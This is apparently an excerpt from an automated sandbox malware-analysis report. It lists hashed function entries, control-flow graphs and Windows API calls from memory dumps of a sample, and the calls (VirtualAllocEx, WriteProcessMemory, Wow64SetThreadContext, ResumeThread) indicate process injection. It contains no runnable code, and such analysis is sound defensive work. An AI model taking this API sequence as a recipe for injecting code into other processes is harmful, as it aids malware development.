                                                                              • Opcode ID: 2ce80388e8e040e9560041c0e0fca17d5372f5b9efff4aae3369a2be625382e9
                                                                              • Instruction ID: 2b364a79f35573094d491473ec8395af4549fbd3aac11b14e6da6d028ff1ccfa
                                                                              • Opcode Fuzzy Hash: 2ce80388e8e040e9560041c0e0fca17d5372f5b9efff4aae3369a2be625382e9
                                                                              • Instruction Fuzzy Hash: A741CFB0C0061DCBDB24DFA9C884ADEFBF5BF49304F64806AD408AB255DB756989CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 545 24b590d-24b590f 546 24b591d-24b59d9 CreateActCtxA 545->546 548 24b59db-24b59e1 546->548 549 24b59e2-24b5a3c 546->549 548->549 556 24b5a4b-24b5a4f 549->556 557 24b5a3e-24b5a41 549->557 558 24b5a51-24b5a5d 556->558 559 24b5a60 556->559 557->556 558->559 561 24b5a61 559->561 561->561
                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 024B59C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1713492102.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_24b0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: d5ee782c97ef781ec2d2768643bea48f488500526d220678c9da1e51dc094f65
                                                                              • Instruction ID: 8defbf55c8ed9f49a8e33c9b228c47927331b70e0c48a24fb2c9b70d13a735c9
                                                                              • Opcode Fuzzy Hash: d5ee782c97ef781ec2d2768643bea48f488500526d220678c9da1e51dc094f65
                                                                              • Instruction Fuzzy Hash: 5D41CFB0C00619CFDB24DFA9C9846CEBBB5BF49304F24806AD408BB265DB756989CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 562 56dd9f8-56dda4e 565 56dda5e-56dda9d WriteProcessMemory 562->565 566 56dda50-56dda5c 562->566 568 56dda9f-56ddaa5 565->568 569 56ddaa6-56ddad6 565->569 566->565 568->569
                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 056DDA90
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 6bc170978a85334bbfeed6ec72dbff5534f4af0f6a4e3e0acecd2058f468fa82
                                                                              • Instruction ID: 103284d0603de247e8803181024069925399d80643ec65b52a1268e2d59b3ca5
                                                                              • Opcode Fuzzy Hash: 6bc170978a85334bbfeed6ec72dbff5534f4af0f6a4e3e0acecd2058f468fa82
                                                                              • Instruction Fuzzy Hash: 7C2146B59003499FCB10DFA9C885BDEBBF5FF48310F148829E959A7250D778A944CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 573 56dda00-56dda4e 575 56dda5e-56dda9d WriteProcessMemory 573->575 576 56dda50-56dda5c 573->576 578 56dda9f-56ddaa5 575->578 579 56ddaa6-56ddad6 575->579 576->575 578->579
                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 056DDA90
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: c82f265ace59b276f1d72e9883e53f65878dc86833cfc4c01526d366371575fa
                                                                              • Instruction ID: ad429547afed06b102699f77c9b1654349e40b226c188ae13b1a775fe1c5144f
                                                                              • Opcode Fuzzy Hash: c82f265ace59b276f1d72e9883e53f65878dc86833cfc4c01526d366371575fa
                                                                              • Instruction Fuzzy Hash: 4C2157B1D003099FCB10DFA9C884BDEBBF5FF48310F148829E959A7240D7789944CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 583 56ddae8-56ddb7d ReadProcessMemory 587 56ddb7f-56ddb85 583->587 588 56ddb86-56ddbb6 583->588 587->588
                                                                              APIs
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 056DDB70
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0
                                                                              • Opcode ID: d0f34352fc763dfe7340241dc84d509242319280f37b83ad80fc62b25ab7f6b6
                                                                              • Instruction ID: dca9401a05bea59ef4aa9b7ebf00e8d28ed739c0627c7f1c7e33c02ee1c3fa30
                                                                              • Opcode Fuzzy Hash: d0f34352fc763dfe7340241dc84d509242319280f37b83ad80fc62b25ab7f6b6
                                                                              • Instruction Fuzzy Hash: 012136B5C003499FCB10DFAAC885ADEFBF5FF48320F108429E558A7250C738A944CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 592 56dd860-56dd8b3 595 56dd8b5-56dd8c1 592->595 596 56dd8c3-56dd8f3 Wow64SetThreadContext 592->596 595->596 598 56dd8fc-56dd92c 596->598 599 56dd8f5-56dd8fb 596->599 599->598
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 056DD8E6
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 53ae01e1f9182d1b0b1fd6f4a18bf8e130afe4651714d4145e20a7e984af320f
                                                                              • Instruction ID: 25e7ab1ab4a076a32e861d1eaa5e767dd72d193aa47e94c62c8fb4fc29d4007e
                                                                              • Opcode Fuzzy Hash: 53ae01e1f9182d1b0b1fd6f4a18bf8e130afe4651714d4145e20a7e984af320f
                                                                              • Instruction Fuzzy Hash: FA2125B5D003098FDB10DFAAC4857EEBBF4EB88324F548429D459A7241CB78A985CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 603 24bc9e0-24bd3d4 DuplicateHandle 605 24bd3dd-24bd3fa 603->605 606 24bd3d6-24bd3dc 603->606 606->605
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024BD306,?,?,?,?,?), ref: 024BD3C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1713492102.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_24b0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: ed970ccf287305452574b3eae21352da25bd9ec87c9e88bea7683641db3fa1e9
                                                                              • Instruction ID: a7331badbefb61b61dd1af0882b58db50266a47ae7a99565e994b86118f00079
                                                                              • Opcode Fuzzy Hash: ed970ccf287305452574b3eae21352da25bd9ec87c9e88bea7683641db3fa1e9
                                                                              • Instruction Fuzzy Hash: C721E3B5D00308DFDB10CF9AD584ADEBBF4EB48320F14846AE918A7351D378A950CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 609 24bd338-24bd3d4 DuplicateHandle 610 24bd3dd-24bd3fa 609->610 611 24bd3d6-24bd3dc 609->611 611->610
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024BD306,?,?,?,?,?), ref: 024BD3C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1713492102.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_24b0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: 1950dfb061ffad5d3007c2de1ef6805df4d8eba3618b089cfc8b30d97dcd278f
                                                                              • Instruction ID: a768535f210da8de12501e6048e59cec27f5d2830ab3a61e4b050d34ef736d97
                                                                              • Opcode Fuzzy Hash: 1950dfb061ffad5d3007c2de1ef6805df4d8eba3618b089cfc8b30d97dcd278f
                                                                              • Instruction Fuzzy Hash: 592103B5D00208DFDB10CFAAD584ADEBFF5EB48324F14801AE918A3311C378A950CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 614 56dd868-56dd8b3 616 56dd8b5-56dd8c1 614->616 617 56dd8c3-56dd8f3 Wow64SetThreadContext 614->617 616->617 619 56dd8fc-56dd92c 617->619 620 56dd8f5-56dd8fb 617->620 620->619
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 056DD8E6
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 7321484af5f80eb6faf2de2ea1eba374ffed796bca54f88fa186cde3ec8b37a8
                                                                              • Instruction ID: fc0b0dc26f0b8b83f400a5d9faf34501c5589de7790f1a325e29483a03ef055b
                                                                              • Opcode Fuzzy Hash: 7321484af5f80eb6faf2de2ea1eba374ffed796bca54f88fa186cde3ec8b37a8
                                                                              • Instruction Fuzzy Hash: 3921F5B1D042098FDB10DFAAC4857AEBBF4AB88324F148429D459A7241CB78A985CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 056DDB70
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0
                                                                              • Opcode ID: 3aa7413420d252bf679af5bc9e9bacbe00d3eada76c658d235aa98898b2dcf2e
                                                                              • Instruction ID: 372fcfac79f5d7a25a1c091430ae585a8e081a01508b42bf6f7d425a749afeb8
                                                                              • Opcode Fuzzy Hash: 3aa7413420d252bf679af5bc9e9bacbe00d3eada76c658d235aa98898b2dcf2e
                                                                              • Instruction Fuzzy Hash: C02139B1D003599FCB10DFAAC844ADEFBF5FF48320F108429E559A7250C7389544CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056DD9AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 3b5819db5f00ef847c13f786f0f0411597e01fc91b4aeece3a2894b7049fd777
                                                                              • Instruction ID: cd796c563ac59b9efccaad4689c453e58af2c6d837baa3b60d93a8e4fae3d2ce
                                                                              • Opcode Fuzzy Hash: 3b5819db5f00ef847c13f786f0f0411597e01fc91b4aeece3a2894b7049fd777
                                                                              • Instruction Fuzzy Hash: 4E1159759002499FCB10DFA9C845BDEFFF5EF88324F148819E559A7250C735A544CFA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,024BB141,00000800,00000000,00000000), ref: 024BB352
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1713492102.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_24b0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 9d6e77de1ac0a28870f9fd23b8ff196b429933fcdf00537d6b8c6302bc17a553
                                                                              • Instruction ID: e7ea02185c1c5dfe765faaba7caf1f30a4c7fea4e4b00c8197ab0ad40545bb47
                                                                              • Opcode Fuzzy Hash: 9d6e77de1ac0a28870f9fd23b8ff196b429933fcdf00537d6b8c6302bc17a553
                                                                              • Instruction Fuzzy Hash: C71114B69003089FDB10DF9AC448ADEFBF4EF48324F14842AD819A7210C375A545CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,024BB141,00000800,00000000,00000000), ref: 024BB352
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1713492102.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_24b0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 5d559bb92e716c9803e3800e656a5cdc9b43f1cf1905378b3f9f58384de03d57
                                                                              • Instruction ID: 7233b1d86141632bf76cdd68073518c48d64e175f16fea6ff5002d6a2ab80622
                                                                              • Opcode Fuzzy Hash: 5d559bb92e716c9803e3800e656a5cdc9b43f1cf1905378b3f9f58384de03d57
                                                                              • Instruction Fuzzy Hash: B11112B69003488FCB14CF9AC484ADEFBF4EF88324F14846AD819A7210C379A545CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056DD9AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 89ce15bd30519de7c473143778950c41b1d5806f552c8b2e7871d3f3e862089e
                                                                              • Instruction ID: 55e27fd493c891500e64373e212b01701ca869f7d6e8cb72b353a02836bf24a8
                                                                              • Opcode Fuzzy Hash: 89ce15bd30519de7c473143778950c41b1d5806f552c8b2e7871d3f3e862089e
                                                                              • Instruction Fuzzy Hash: 7E1167719002489FCB10DFAAC844BDEFFF5EF88324F108819E559A7250C735A540CFA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              • Opcode ID: eb7f473e692c8c1b8f23e9cccd793931262bf8aeda7bc0f07b2c8ebffac97eaa
                                                                              • Instruction ID: b1005213d4c3775c1359002a61403adf7e0805b31968327f96c6d4b9019991c7
                                                                              • Opcode Fuzzy Hash: eb7f473e692c8c1b8f23e9cccd793931262bf8aeda7bc0f07b2c8ebffac97eaa
                                                                              • Instruction Fuzzy Hash: 8F1158B5D003488BCB10DFAAC8457DEFBF5EB88324F248429D419A7250C639A944CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              • Opcode ID: 3798d57be7937bc8c0eb5207c5314ae54c74505830f7a2bd11c294d538c6985a
                                                                              • Instruction ID: 980653f50e21f0b7c72ff3778e77e10b89cbc02d6865b0004d57bcef4a6de361
                                                                              • Opcode Fuzzy Hash: 3798d57be7937bc8c0eb5207c5314ae54c74505830f7a2bd11c294d538c6985a
                                                                              • Instruction Fuzzy Hash: DF1136B1D003488FCB20DFAAC4457DEFBF5EB88324F248829D459A7250CB79A944CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 024BB0C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1713492102.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_24b0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              • Opcode ID: af8a5419e7b1c8c5eabadea332c78f71aa011fdbd061d8f9dce389f7c57f74e3
                                                                              • Instruction ID: 8752541f9ba15fd838cd98053928bae1b6ed33df2c284869125af1fde035ac1e
                                                                              • Opcode Fuzzy Hash: af8a5419e7b1c8c5eabadea332c78f71aa011fdbd061d8f9dce389f7c57f74e3
                                                                              • Instruction Fuzzy Hash: 6C110FB5D003498FCB20DF9AC444ADEFBF4EF88224F10842AD828B7610C379A545CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PostMessageW.USER32(?,?,?,?), ref: 0A120355
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1719577260.000000000A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A120000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_a120000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost
                                                                              • String ID:
                                                                              • API String ID: 410705778-0
                                                                              • Opcode ID: 86db41c5c06b40a75d9b6a0025db73c672422a7cc1fa290284ec11777372fa41
                                                                              • Instruction ID: 2ba57c2b22af0ea06751be7084c0eb255b642eed6bf1b23d1bb5119deb510e23
                                                                              • Opcode Fuzzy Hash: 86db41c5c06b40a75d9b6a0025db73c672422a7cc1fa290284ec11777372fa41
                                                                              • Instruction Fuzzy Hash: 3E11F5B58003499FDB20DF99D845BDEBFF8EB48324F148419D558A7250C375A984CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PostMessageW.USER32(?,?,?,?), ref: 0A120355
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1719577260.000000000A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A120000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_a120000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost
                                                                              • String ID:
                                                                              • API String ID: 410705778-0
                                                                              • Opcode ID: 38ed046b9af5881727fac2debc47e49597e48f7ff44c76e9724ee614443776be
                                                                              • Instruction ID: d608a5b27d172eaa7d066b7f473de9d799ad165fc648759aa04a06bc199359d3
                                                                              • Opcode Fuzzy Hash: 38ed046b9af5881727fac2debc47e49597e48f7ff44c76e9724ee614443776be
                                                                              • Instruction Fuzzy Hash: 5E11F2B58003489FDB20DF9AD848BDEBBF8EB48320F108419D558A7210C379A984CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Te^q
                                                                              • API String ID: 0-671973202
                                                                              • Opcode ID: b781622614ac200e88e2ab5db589d2033abed8707ebab5840501098b114cb621
                                                                              • Instruction ID: ca0014955c331c1fdbd53ae01a3c0c3562e458c062d9fbcdcee87f72d5cd4e70
                                                                              • Opcode Fuzzy Hash: b781622614ac200e88e2ab5db589d2033abed8707ebab5840501098b114cb621
                                                                              • Instruction Fuzzy Hash: 64412874949209CFDB64EF68D498BFDBBB5FB09310F109699E409A7351CB309949CF10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: aa4202360abc72c659a28d67160a0441dd63105ef92273d0d30b5505088f0a6c
                                                                              • Instruction ID: 2d8999b1baef744dba34ba9fb0fe1a80672e82b7fbf3209903094fb73e40a7b2
                                                                              • Opcode Fuzzy Hash: aa4202360abc72c659a28d67160a0441dd63105ef92273d0d30b5505088f0a6c
                                                                              • Instruction Fuzzy Hash: 44710074D05218CFCB00EFA8D484AFDBBBAFB49300F10AA19D815A7345E7B69999CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cf70927d25f1f07b78605b309a71c51f46076d851e06ea8965d3a59ae2d0ab80
                                                                              • Instruction ID: 26cc34783c5b052118026e9a4aad7c70de35b1c435faa715cd02d06f96009f44
                                                                              • Opcode Fuzzy Hash: cf70927d25f1f07b78605b309a71c51f46076d851e06ea8965d3a59ae2d0ab80
                                                                              • Instruction Fuzzy Hash: F8412B70A08109DFC704EF59D5889BEBBFAFF9E300B51A194D409AB296D770D951CF21
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3d9cfed51c10d4aa594411cdb79310379de8489df19cc5910f9bbedba9d069e8
                                                                              • Instruction ID: ede032a7421955b41406176f4609c63f658062fe825949426e05936deabefd58
                                                                              • Opcode Fuzzy Hash: 3d9cfed51c10d4aa594411cdb79310379de8489df19cc5910f9bbedba9d069e8
                                                                              • Instruction Fuzzy Hash: B641F874E04218EFCB00EFA9E884AEDBBB9FB49310F109625E505B7390D7759A91CF94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1572cdef916cdcc87dcfb2da960a8d120581ca708773368831f8b1a9edab61c1
                                                                              • Instruction ID: 115d677f4553973d283e194f589142ac055eef67da54c8c173fb93a8713b4c3d
                                                                              • Opcode Fuzzy Hash: 1572cdef916cdcc87dcfb2da960a8d120581ca708773368831f8b1a9edab61c1
                                                                              • Instruction Fuzzy Hash: CF31CE70904208EBCB00DF95E488AFDBBF6FB8D214F106595E809A7395C7759995CF60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b94376d4b093a0173ffaab913497c093cfa0bc38529561b5efa47be90309cc5
                                                                              • Instruction ID: 45bd5b7b0bece74028e763993f1efeb376b8b53003ad4caa742e6ef907ef7f41
                                                                              • Opcode Fuzzy Hash: 5b94376d4b093a0173ffaab913497c093cfa0bc38529561b5efa47be90309cc5
                                                                              • Instruction Fuzzy Hash: B3319074E012199FCB08DFA9D940AEEBBF6FF88300F10852AE415A7364DB3559468BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1712530692.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_87d000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4f1ef1dc7fb4dedb0f35f04b4745c22fd97e04791d35d126e60d253c76a460fc
                                                                              • Instruction ID: dbf79335eb758f9efd3aca253024e7c2f443ae8299cd2526c87be66f475a4718
                                                                              • Opcode Fuzzy Hash: 4f1ef1dc7fb4dedb0f35f04b4745c22fd97e04791d35d126e60d253c76a460fc
                                                                              • Instruction Fuzzy Hash: A6210071504344DFCB05DF14D9C0B2ABFB5FF98328F24C669E9098B25AC336D856CAA2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1712530692.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_87d000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: de6f9c87792bd9befce21229d05d8d81a61f03b3de067bd0a8fdeb95744c5fd6
                                                                              • Instruction ID: 4f83a69697bc541b803e8b9d80ec7e8429b9afce1d51bb8247cc2f0f2f7b3474
                                                                              • Opcode Fuzzy Hash: de6f9c87792bd9befce21229d05d8d81a61f03b3de067bd0a8fdeb95744c5fd6
                                                                              • Instruction Fuzzy Hash: 7121E271500304DFDB05DF14D9C4B16BF75FB94324F24C169D9098A25AC336E856C6A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1713171305.000000000223D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0223D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_223d000_SgJzugoOJvLgL.jbxd
